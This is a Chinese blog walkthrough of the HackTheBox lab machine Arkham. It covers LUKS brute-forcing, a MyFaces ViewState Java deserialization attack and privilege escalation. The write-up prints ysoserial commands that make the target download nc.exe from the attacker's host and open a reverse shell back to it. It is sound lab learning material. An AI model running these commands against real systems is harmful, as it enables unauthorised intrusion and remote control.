No.83-HackTheBox-windows-Arkham-Walkthrough渗透学习

**

HackTheBox-windows-Arkham-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/176
靶机难度:中级(4.8/10)
靶机发布日期:2019年5月15日
靶机描述:
Arkham is a medium difficulty Windows box which needs knowledge about encryption, java deserialization and Windows exploitation. A disk image present in an open share is found which is a LUKS encrypted disk. The disk is cracked to obtain configuration files. The Apache MyFaces page running on tomcat is vulnerable to deserialization but the viewstate needs to encrypted. After establishing a foothold an Outlook OST file is found, which contains a screenshot with a password. The user is found to be in the Administrators group, and a UAC bypass can be performed to gain a SYSTEM shell.

作者:大余
时间:2020-04-04
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.130…
在这里插入图片描述
IIS在端口80上与SMB和Apache tomcat一起在各自的端口上运行着…还有49666、49667端口…
在这里插入图片描述
找到BatShare共享,进去看看…
在这里插入图片描述
发现文件appserver.zip…好大的文件…
在这里插入图片描述
网络太差了!!移动的宽带走个代理出去,根本下不动appserver,我mount挂载,还是等待了半天才打开…
更坑爹的是,挂载完copy也不行,应该是网络原因,但是操作别的都正常…
在这里插入图片描述
非要以这种方式,等了7分钟,才完成14MB文件的加压~~~
在这里插入图片描述
只是告诉我们这是Linux服务器的备份镜像,需要密码登陆…果然这是LUKS加密的图像…
在这里插入图片描述
搜先利用grep batman /usr/share/wordlists/rockyou.txt > dayu.txt生成密码库…因为这台靶机http就提及了很多人名…batman 是列举人名的密码库…
然后利用bruteforce-luks暴力破解密码的工具进行破解,获得密码…
在这里插入图片描述
利用cryptsetup解密磁盘内容,输入密码可以看到,桌面生成了一个磁盘,进入是蝙蝠侠电视剧的几张图…和文件
里面是一些服务器配置文件和几张图,目前没发现别的信息,没密码没用户…继续往下
在这里插入图片描述
在这里插入图片描述
80和8080的web页面…
在这里插入图片描述
访问80端口的Subscription订阅信息,重定向到了userSubscribe.faces页面…
在这里插入图片描述
在这里插入图片描述
利用burp suit 分析页面具有.faces扩展名,并且POST请求具有参数javax.faces.ViewState…
在这里插入图片描述
在前端代码更清晰的看到此ViewState属性,这是一种MyFaces用于存储视图当前状态的机制,此状态是Java序列化的对象,这意味着我们可能必须进行Java反序列化攻击。存在的反序列化漏洞…
在这里插入图片描述
参考这篇文章可以获得点思路…java.lang.Object很好的解释了,这是base64编码进行DES和macSHA1加密的Java序列化对象…
下面的思路是:
找到DES和macSHA1密匙,然后利用base64值进行javax.faces.ViewState=注入…base64可以利用java生成shellcode转码成base64即可提权…开始
在这里插入图片描述
在前面挂在出的盘里web.xml.bak文件发现了DES和macSHA1密匙…
这里需要利用ysoserial集成工具进行生成jave反序列化的shellcode…功能很多
在这里插入图片描述
在这里插入图片描述
准备好了生成shellcode的工具…
在这里插入图片描述
在这里插入图片描述
命令:java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd.exe /c powershell -c Invoke-WebRequest -Uri "http://10.10.14.11/nc.exe" -OutFile "C:\windows\system32\spool\drivers\color\nc.exe"' > exploit
利用ysoserial最新版集成生成shellcode…
在这里插入图片描述
在这里插入图片描述
然后利用DES密匙简单的python代码生成base64值…
在这里插入图片描述
成功注入…NC上传成功…
在这里插入图片描述
命令:java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd.exe /c c:\windows\system32\spool\drivers\color\nc.exe -nv 10.10.14.11 443 -e cmd.exe' > exploit2
在这里插入图片描述
在这里插入图片描述
按照前面同理,写入shellcode出发nc即可获得反向外壳…
在这里插入图片描述
成功获得user信息…这里需要进入powershell
在这里插入图片描述
枚举目录发现在backups中C:\Users\Alfred\Downloads目录下有一个zip文件…利用nc进行下载…
在这里插入图片描述
存档中只有一个arkham.local.ostOutlook电子邮件文件,利用readpst将其转换…
转换成Drafts.mbox文件…
在这里插入图片描述
查看Drafts.mbox文件,存在base64值…
在这里插入图片描述
将base64转换后,发现这是png格式文件…修改即可
在这里插入图片描述
查看后发现了Batman的密码…
在这里插入图片描述
可以看到Batman用户在Administrators组以及Remote management users组中…
在这里插入图片描述
在这里插入图片描述
利用PowerShell Remoting使用他的凭据,成功进入PowerShell会话,然后利用原先上传的NC获得了反向shell…
在这里插入图片描述
直接读取root信息无法查看…前面查看信息是在adminidtrator组里,我进行了挂在共享…成功
在这里插入图片描述
通过挂在的E盘,成功获得了root信息…

由于我们已经成功得到root权限查看user.txt和root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值